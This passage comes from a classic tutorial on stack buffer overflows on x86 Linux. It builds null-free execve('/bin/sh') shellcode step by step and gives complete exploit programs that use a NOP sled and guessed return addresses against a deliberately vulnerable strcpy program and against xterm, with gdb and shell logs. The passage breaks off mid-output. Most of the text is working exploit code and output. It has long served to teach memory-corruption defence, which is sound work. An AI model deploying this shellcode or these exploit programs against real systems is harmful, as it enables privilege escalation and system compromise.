pass the arguments on the stack, others on the registers. Some use a software
interrupt to jump to kernel mode, others use a far call. Linux passes its
arguments to the system call on the registers, and uses a software interrupt
to jump into kernel mode.
------------------------------------------------------------------------------
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
The procedure prelude.
0x80002c0 <__execve+4>: movl $0xb,%eax
Copy 0xb (11 decimal) into the EAX register. This is the index into the
syscall table. 11 is execve.
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
Copy the address of "/bin/sh" into EBX.
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
Copy the address of name[] into ECX.
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
Copy the address of the null pointer into %edx.
0x80002ce <__execve+18>: int $0x80
Change into kernel mode.
------------------------------------------------------------------------------
So as we can see there is not much to the execve() system call. All we need
to do is:
a) Have the null terminated string "/bin/sh" somewhere in memory.
b) Have the address of the string "/bin/sh" somewhere in memory
followed by a null long word.
c) Copy 0xb into the EAX register.
d) Copy the address of the string "/bin/sh" into the EBX register.
e) Copy the address of the address of the string "/bin/sh" into the
ECX register.
f) Copy the address of the null long word into the EDX register.
g) Execute the int $0x80 instruction.
But what if the execve() call fails for some reason? The program will
continue fetching instructions from the stack, which may contain random data!
The program will most likely core dump. We want the program to exit cleanly
if the execve syscall fails. To accomplish this we must then add an exit
syscall after the execve syscall. What does the exit syscall look like?
exit.c
------------------------------------------------------------------------------
#include <stdlib.h>
void main() {
exit(0);
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o exit -static exit.c
[aleph1]$ gdb exit
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1,%eax
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx
0x8000358 <_exit+12>: int $0x80
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.
------------------------------------------------------------------------------
The exit syscall will place 0x1 in EAX, place the exit code in EBX,
and execute "int 0x80". That's it. Most applications return 0 on exit to
indicate no errors. We will place 0 in EBX. Our list of steps is now:
a) Have the null terminated string "/bin/sh" somewhere in memory.
b) Have the address of the string "/bin/sh" somewhere in memory
followed by a null long word.
c) Copy 0xb into the EAX register.
d) Copy the address of the string "/bin/sh" into the EBX register.
e) Copy the address of the address of the string "/bin/sh" into the
ECX register.
f) Copy the address of the null long word into the EDX register.
g) Execute the int $0x80 instruction.
h) Copy 0x1 into the EAX register.
i) Copy 0x0 into the EBX register.
j) Execute the int $0x80 instruction.
Trying to put this together in assembly language, placing the string
after the code, and remembering we will place the address of the string,
and null word after the array, we have:
------------------------------------------------------------------------------
movl string_addr,string_addr_addr
movb $0x0,null_byte_addr
movl $0x0,null_addr
movl $0xb,%eax
movl string_addr,%ebx
leal string_addr,%ecx
leal null_string,%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
/bin/sh string goes here.
------------------------------------------------------------------------------
The problem is that we don't know where in the memory space of the
program we are trying to exploit the code (and the string that follows
it) will be placed. One way around it is to use a JMP, and a CALL
instruction. The JMP and CALL instructions can use IP relative addressing,
which means we can jump to an offset from the current IP without needing
to know the exact address of where in memory we want to jump to. If we
place a CALL instruction right before the "/bin/sh" string, and a JMP
instruction to it, the string's address will be pushed onto the stack as
the return address when CALL is executed. All we need then is to copy the
return address into a register. The CALL instruction can simply call the
start of our code above. Assuming now that J stands for the JMP instruction,
C for the CALL instruction, and s for the string, the execution flow would
now be:
bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c
<------   [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03]
           ^|^             ^|            |
           |||_____________||____________| (1)
       (2)  ||_____________||
             |______________| (3)
top of                                                            bottom of
stack                                                                 stack
With these modifications, using indexed addressing, and writing down how
many bytes each instruction takes our code looks like:
------------------------------------------------------------------------------
jmp offset-to-call # 2 bytes
popl %esi # 1 byte
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi)# 4 bytes
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call offset-to-popl # 5 bytes
/bin/sh string goes here.
------------------------------------------------------------------------------
Calculating the offsets from jmp to call, from call to popl, from
the string address to the array, and from the string address to the null
long word, we now have:
------------------------------------------------------------------------------
        jmp    0x2a                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2f                    # 5 bytes
        .string "/bin/sh"               # 8 bytes
------------------------------------------------------------------------------
Looks good. To make sure it works correctly we must compile it and run it.
But there is a problem. Our code modifies itself, but most operating systems
mark code pages read-only. To get around this restriction we must place the
code we wish to execute in the stack or data segment, and transfer control
to it. To do so we will place our code in a global array in the data
segment. We first need a hex representation of the binary code. Let's
compile it first, and then use gdb to obtain it.
shellcodeasm.c
------------------------------------------------------------------------------
void main() {
__asm__("
jmp 0x2a # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2f # 5 bytes
.string \"/bin/sh\" # 8 bytes
");
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o shellcodeasm -g -ggdb shellcodeasm.c
[aleph1]$ gdb shellcodeasm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 : pushl %ebp
0x8000131 : movl %esp,%ebp
0x8000133 : jmp 0x800015f
0x8000135 : popl %esi
0x8000136 : movl %esi,0x8(%esi)
0x8000139 : movb $0x0,0x7(%esi)
0x800013d : movl $0x0,0xc(%esi)
0x8000144 : movl $0xb,%eax
0x8000149 : movl %esi,%ebx
0x800014b : leal 0x8(%esi),%ecx
0x800014e : leal 0xc(%esi),%edx
0x8000151 : int $0x80
0x8000153 : movl $0x1,%eax
0x8000158 : movl $0x0,%ebx
0x800015d : int $0x80
0x800015f : call 0x8000135
0x8000164 : das
0x8000165 : boundl 0x6e(%ecx),%ebp
0x8000168 : das
0x8000169 : jae 0x80001d3 <__new_exitfn+55>
0x800016b : addb %cl,0x55c35dec(%ecx)
End of assembler dump.
(gdb) x/bx main+3
0x8000133 : 0xeb
(gdb)
0x8000134 : 0x2a
(gdb)
.
.
.
------------------------------------------------------------------------------
testsc.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc testsc.c
[aleph1]$ ./testsc
$ exit
[aleph1]$
------------------------------------------------------------------------------
It works! But there is an obstacle. In most cases we'll be trying to
overflow a character buffer. As such any null bytes in our shellcode will be
considered the end of the string, and the copy will be terminated. There must
be no null bytes in the shellcode for the exploit to work. Let's try to
eliminate the null bytes (and at the same time make the code smaller).
Problem instruction:                 Substitute with:
--------------------------------------------------------
movb   $0x0,0x7(%esi)                xorl   %eax,%eax
movl   $0x0,0xc(%esi)                movb   %al,0x7(%esi)
                                     movl   %eax,0xc(%esi)
--------------------------------------------------------
movl   $0xb,%eax                     movb   $0xb,%al
--------------------------------------------------------
movl   $0x1, %eax                    xorl   %ebx,%ebx
movl   $0x0, %ebx                    movl   %ebx,%eax
                                     inc    %eax
--------------------------------------------------------
Our improved code:
shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
jmp 0x1f # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
xorl %eax,%eax # 2 bytes
movb %al,0x7(%esi) # 3 bytes
movl %eax,0xc(%esi) # 3 bytes
movb $0xb,%al # 2 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
xorl %ebx,%ebx # 2 bytes
movl %ebx,%eax # 2 bytes
inc %eax # 1 byte
int $0x80 # 2 bytes
call -0x24 # 5 bytes
.string \"/bin/sh\" # 8 bytes
# 46 bytes total
");
}
------------------------------------------------------------------------------
And our new test program:
testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o testsc2 testsc2.c
[aleph1]$ ./testsc2
$ exit
[aleph1]$
------------------------------------------------------------------------------
Writing an Exploit
~~~~~~~~~~~~~~~~~~
(or how to mung the stack)
~~~~~~~~~~~~~~~~~~~~~~~~~~
Let's try to pull all our pieces together. We have the shellcode. We know
it must be part of the string which we'll use to overflow the buffer. We
know we must point the return address back into the buffer. This example will
demonstrate these points:
exploit1.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ gcc -o exploit1 exploit1.c
[aleph1]$ ./exploit1
$ exit
exit
[aleph1]$
------------------------------------------------------------------------------
What we have done above is fill the array large_string[] with the
address of buffer[], which is where our code will be. Then we copy our
shellcode into the beginning of the large_string string. strcpy() will then
copy large_string onto buffer without doing any bounds checking, and will
overflow the return address, overwriting it with the address where our code
is now located. Once we reach the end of main and it tries to return, it
jumps to our code, and execs a shell.
The problem we face when trying to overflow the buffer of another
program is figuring out at what address the buffer (and thus our
code) will be. The answer is that, on a system that does not randomize
stack addresses, the stack of every program will start at the same address.
Most programs do not push more than a few hundred or a few thousand bytes
into the stack at any one time. Therefore by knowing where the stack starts
we can try to guess where the buffer we are trying to overflow will be.
Here is a little program that will print its stack pointer:
sp.c
------------------------------------------------------------------------------
#include <stdio.h>
/* Returns the stack pointer; relies on EAX holding the return value. */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}
void main() {
  printf("0x%lx\n", get_sp());
}
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[aleph1]$ ./sp
0x8000470
[aleph1]$
------------------------------------------------------------------------------
Let's assume the program we are trying to overflow is:
vulnerable.c
------------------------------------------------------------------------------
void main(int argc, char *argv[]) {
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
------------------------------------------------------------------------------
We can create a program that takes as a parameter a buffer size, and an
offset from its own stack pointer (where we believe the buffer we want to
overflow may live). We'll put the overflow string in an environment variable
so it is easy to manipulate:
exploit2.c
------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
Now we can try to guess what the buffer and offset should be:
------------------------------------------------------------------------------
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------
As we can see this is not an efficient process. Trying to guess the
offset even while knowing where the beginning of the stack lives is nearly
impossible. We would need at best a hundred tries, and at worst a couple of
thousand. The problem is we need to guess *exactly* where the address of our
code will start. If we are off by one byte more or less we will just get a
segmentation violation or an invalid instruction. One way to increase our
chances is to pad the front of our overflow buffer with NOP instructions.
Almost all processors have a NOP instruction that performs a null operation.
It is usually used to delay execution for purposes of timing. We will take
advantage of it and fill half of our overflow buffer with them. We will place
our shellcode at the center, and then follow it with the return addresses. If
we are lucky and the return address points anywhere in the string of NOPs,
they will just get executed until they reach our code. In the Intel
architecture the NOP instruction is one byte long and it translates to 0x90
in machine code. Assuming the stack starts at address 0xFF, that S stands for
shell code, and that N stands for a NOP instruction the new stack would look
like this:
bottom of  DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF     top of
memory     89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF     memory
           buffer                sfp   ret   a     b     c
<------   [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
                 ^                     |
                 |_____________________|
top of                                                            bottom of
stack                                                                 stack
The new exploit is then:
exploit3.c
------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
memcpy(buff,"EGG=",4);
putenv(buff);
system("/bin/bash");
}
------------------------------------------------------------------------------
A good selection for our buffer size is about 100 bytes more than the size
of the buffer we are trying to overflow. This will place our code at the end
of the buffer we are trying to overflow, giving a lot of space for the NOPs,
but still overwriting the return address with the address we guessed. The
buffer we are trying to overflow is 512 bytes long, so we'll use 612. Let's
try to overflow our test program with our new exploit:
------------------------------------------------------------------------------
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------
Whoa! First try! This change has improved our chances a hundredfold.
Let's try it now on a real case of a buffer overflow. We'll use for our
demonstration the buffer overflow on the Xt library. For our example, we'll
use xterm (all programs linked with the Xt library are vulnerable). You must
be running an X server and allow connections to it from the localhost. Set
your DISPLAY variable accordingly.
------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit3 1124
Using address: 0xbffffdb4
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF
°
óV
¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤
ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤
¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿÿ¿¤¤ÿ¿¤¤ÿ¿¤¤ÿ¿¤¤
^C
[aleph1]$ exit
[aleph1]$ ./exploit3 2148 100
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF
°
óV
¤1¤Ø@¤èÜÿÿÿ/bin/sh¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤
ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H
¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿
H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ
¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ¿H¤ÿ
Warning: some arguments in previous message were lost
Illegal instruction
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit3 2148 600
Using address: 0xbffffb54
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "ë^1¤FF
°
óV
¤1¤Ø@¤èÜÿÿÿ/bin/shûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tû
ÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿Tûÿ¿T
